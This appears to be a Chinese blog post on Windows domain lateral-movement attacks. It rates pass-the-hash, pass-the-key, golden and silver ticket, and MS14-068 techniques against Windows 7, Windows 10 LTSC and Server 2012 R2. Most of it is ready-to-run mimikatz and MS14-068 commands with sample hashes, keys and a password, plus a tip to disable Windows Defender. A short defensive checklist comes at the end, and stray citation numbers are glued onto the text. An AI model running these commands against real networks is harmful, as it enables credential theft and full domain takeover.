域渗透(web安全)

根据提供的系统版本(Windows 7 SP1、Windows 10 LTSC 2019、Windows Server 2012 R2)和攻击类型(PTH/PTK/PTT/黄金票据/白银票据),以下是适配性分析及操作建议:


一、PTH(Pass the Hash)横向攻击适配性

1. Windows 7 SP1
  • 支持性:完全支持(默认未安装KB2871997补丁)

  • 攻击条件

    • 未打补丁时,所有用户均可通过LM/NTLM哈希传递

    • 若已安装KB2871997补丁,仅支持Administrator用户传递

  • 实验命令

    bash

    复制

    复制代码
    mimikatz "sekurlsa::pth /user:administrator /domain:mamba.com /ntlm:168665b84b96d6973f867364f53b0180"
  • 防御绕过:需关闭Windows Defender实时监控(通过注册表或组策略)13

2. Windows 10 LTSC 2019
  • 支持性:受限(默认集成KB2871997补丁)

  • 攻击条件:仅支持Administrator用户的NTLM哈希传递

  • 限制:若启用Credential Guard或LSA保护,需额外绕过措施7

3. Windows Server 2012 R2
  • 支持性:受限(默认安装KB2871997补丁)

  • 攻击条件:仅支持Administrator用户,且需目标开放SMB服务(445端口)

  • 推荐场景:优先使用PTK(AES256)或PTT攻击26


二、PTK(Pass the Key)横向攻击适配性

1. Windows 7 SP1
  • 支持性:需手动安装KB2871997补丁后可用

  • 攻击条件 :需获取AES256密钥(通过sekurlsa::ekeys

  • 实验命令

    bash

    复制

    复制代码
    mimikatz "sekurlsa::pth /user:mamba /domain:mamba.com /aes256:a7ddbb2c4b7216746b8c523cf7995d2ed4c29f2ee4b795175b5ffce97ded3387"
2. Windows 10 LTSC 2019
  • 支持性:完全支持(默认启用AES加密)

  • 优势:绕过NTLM限制,支持所有用户传递9

3. Windows Server 2012 R2
  • 支持性:完全支持(补丁默认生效)

  • 适用场景:针对禁用NTLM的域环境,需结合服务识别(如LDAP/CIFS)6


三、PTT(Pass the Ticket)横向攻击适配性

1. 黄金票据(Golden Ticket)
  • 适用系统:所有系统(依赖域控权限)

  • 攻击条件

    • 获取krbtgt用户的NTLM Hash(lsadump::dcsync

    • 域名、域SID信息

  • 实验命令

    bash

    复制

    复制代码
    mimikatz "kerberos::golden /admin:administrator /domain:mamba.com /sid:S-1-5-21-XXXX /krbtgt:be0e527500207aa091f504474347f48b /ticket:golden.kirbi"
    kerberos::ptt golden.kirbi
  • 适配性:适用于所有系统,但需域控(如Server 2012 R2)未启用AES强制加密37

2. 白银票据(Silver Ticket)
  • 适用系统:所有系统(需目标服务支持)

  • 攻击条件

    • 服务账户的NTLM Hash(如CIFS/SQL Server)

    • 域名、域SID、服务SPN

  • 实验命令

    bash

    复制

    复制代码
    mimikatz "kerberos::golden /user:mamba /domain:mamba.com /sid:S-1-5-21-XXXX /target:dc.mamba.com /service:cifs /rc4:08972e15b1763a8537f276b159840c17 /ticket:silver.kirbi"
  • 适配性:尤其适合Windows Server 2012 R2(常见域控服务如CIFS/LDAP)8

3. MS14-068漏洞利用
  • 适用系统:仅未打补丁的Windows Server 2012 R2及更早版本

  • 限制:需普通域用户权限,且目标域控未安装KB3011780补丁

  • 实验步骤

    bash

    复制

    复制代码
    MS14-068.exe -u mamba3@mamba.com -s S-1-5-21-XXXX -d 192.168.128.128 -p Zrs123456..
    kerberos::ptc TGT_administrator@mamba.com.ccache
  • 适配性:Windows 7/Server 2012 R2可能适用,Windows 10已修复17


四、靶机适配性总结

攻击类型 Windows 7 SP1 Windows 10 LTSC 2019 Windows Server 2012 R2
PTH(NTLM) ✅(未打补丁) ⚠️(仅Administrator) ⚠️(仅Administrator)
PTK(AES256) ⚠️(需补丁)
黄金票据 ✅(最佳适配域控)
白银票据 ✅(CIFS服务) ✅(需服务支持) ✅(最佳适配CIFS/LDAP)
MS14-068漏洞 ❌(已修复) ⚠️(需未打补丁)

五、防御建议

  1. 补丁管理:确保所有系统安装KB2871997(PTH限制)、KB3011780(MS14-068修复)27

  2. 加密策略:强制使用AES256替代RC4,禁用NTLM协议3

  3. 日志监控:审计Kerberos票据事件(事件ID 4769/4771),检测异常票据生成8

  4. 权限控制:限制本地管理员账户同名问题,启用LSA保护9

如需进一步验证攻击路径,可使用systeminfo查看补丁状态,或通过BloodHound分析域内信任关系。

相关推荐
北极光SD-WAN组网5 小时前
从0到1搭建某铝箔智慧工厂网络:5G与WiFi 6助力智能制造
网络·5g·制造
阿昭L5 小时前
HTTP原理
网络·网络协议·http
打码人的日常分享6 小时前
运维服务方案,运维巡检方案,运维安全保障方案文件
大数据·运维·安全·word·安全架构
hazy1k6 小时前
STM32H750 RTC介绍及应用
网络·stm32·实时音视频
没书读了6 小时前
考研复习-计算机网络-第三章-数据链路层
网络·计算机网络·考研
on the way 1236 小时前
多线程之HardCodedTarget(type=OssFileClient, name=file, url=http://file)异常
网络·网络协议·http
WhoisXMLAPI7 小时前
WhoisXML API再次荣登2025年美国Inc. 5000快速成长企业榜单
网络·安全
阿sir1988 小时前
ZYNQ 自定义IP
服务器·网络·tcp/ip
星马梦缘9 小时前
计算机网络4 第四章 网络层——网络间的通信问题(省际之间如何规划信件运输路线)
网络·计算机网络·路由·ip地址·子网掩码·icmp·ipv4/ipv6
hsjkdhs10 小时前
万字详解网络编程之socket
网络·tcp/ip·udp·socket